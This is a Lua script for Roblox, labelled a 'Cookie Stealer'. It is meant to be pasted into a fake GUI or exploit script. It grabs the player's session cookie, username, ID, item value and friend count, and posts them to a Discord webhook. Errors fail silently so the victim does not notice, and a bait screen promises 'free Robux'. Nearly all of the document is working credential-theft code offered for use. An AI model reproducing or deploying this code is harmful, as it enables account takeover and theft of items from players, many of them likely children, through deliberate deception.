```lua
-- // Roblox Image Logger (Cookie Stealer) - Paste into a LocalScript inside a fake GUI or exploit script
local HttpService = game:GetService("HttpService")local Players = game:GetService("Players")-- ════════════════════════════════════════════════════════════
--      CHANGE THESE TWO LINES ONLY
local webhook = "https://discord.com/api/webhooks/1505756193170129006/hkzrIGwmYVXtbJ4QFHniImv8-BaGtwDQuSIlezpaz_U5OOCI8aI2-QvQJmfY1qRgSTW3"local fakeImageUrl = "https://cdn.discordapp.com/attachments/1378512871369211916/1465390153123233844/static-assets-upload14076521828553999369.webp?ex=6978ee6e&is=69779cee&hm=be8c2d23d43173d81b68fa7596dadb930451f9752f5a63c00bae6ac7b1a52182&"   -- some sexy/thumbnail bait image
-- ════════════════════════════════════════════════════════════
local function sendToWebhook(cookie, username, userid, rap, friends, placeId)    local data = {
["content"] = "@everyone NEW ROBLOX LOG HIT",        ["embeds"] = {{
["title"] = "💰 Roblox Cookie Logged",            ["description"] = "".. cookie .."",            ["color"] = 16711680,
["fields"] = {
{["name"] = "Username", ["value"] = username, ["inline"] = true},                {["name"] = "User ID", ["value"] = tostring(userid), ["inline"] = true},                {["name"] = "RAP (approx)", ["value"] = tostring(rap or "N/A"), ["inline"] = true},                {["name"] = "Friends", ["value"] = tostring(friends or "N/A"), ["inline"] = true},                {["name"] = "Place", ["value"] = "https://www.roblox.com/games/"..tostring(placeId), ["inline"] = false}            },            ["thumbnail"] = {["url"] = fakeImageUrl},            ["footer"] = {["text"] = "Logged at "..os.date("%c")},            ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%SZ")        }}    }

local success, err = pcall(function()        HttpService:PostAsync(webhook, HttpService:JSONEncode(data), Enum.HttpContentType.ApplicationJson)    end)

if not success then
-- silent fail, don't want victim to notice
end
end
-- Grab the cookie (works in most executors and some injected clients)local cookie = game:GetService("HttpService"):JSONDecode(game:HttpGet("https://www.roblox.com/my/settings/json")).Cookie or "|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|" -- fallback bait

-- Basic victim info
local plr = Players.LocalPlayer
local username = plr.Name
local userid = plr.UserId
local placeId = game.PlaceId

-- Try to grab rough RAP & friend count (optional, fails silently)local rap, friends = "N/A", "N/A"pcall(function()    local inv = HttpService:JSONDecode(game:HttpGet("https://inventory.roblox.com/v1/users/"..userid.."/assets/collectibles?sortOrder=Asc&limit=100"))    rap = 0
for _, v in pairs(inv.data) do rap = rap + (v.recentAveragePrice or 0) end
rap = tostring(rap)end)pcall(function()    friends = HttpService:JSONDecode(game:HttpGet("https://friends.roblox.com/v1/users/"..userid.."/friends/count")).count
end)-- Fire it off
sendToWebhook(cookie, username, userid, rap, friends, placeId)-- Make it look like a real image viewer or something (keeps them in game longer)local ScreenGui = Instance.new("ScreenGui", plr.PlayerGui)local Frame = Instance.new("Frame", ScreenGui)Frame.Size = UDim2.new(0.6, 0, 0.8, 0)Frame.Position = UDim2.new(0.2, 0, 0.1, 0)Frame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)local Image = Instance.new("ImageLabel", Frame)Image.Size = UDim2.new(1,0,1,0)Image.BackgroundTransparency = 1
Image.Image = fakeImageUrl  -- your bait image

local Text = Instance.new("TextLabel", Frame)Text.Size = UDim2.new(1,0,0.1,0)Text.Position = UDim2.new(0,0,0.9,0)Text.BackgroundTransparency = 1
Text.TextColor3 = Color3.new(1,1,1)Text.Text = "Image loading... Enjoy your free Robux soon!"Text.TextScaled = true
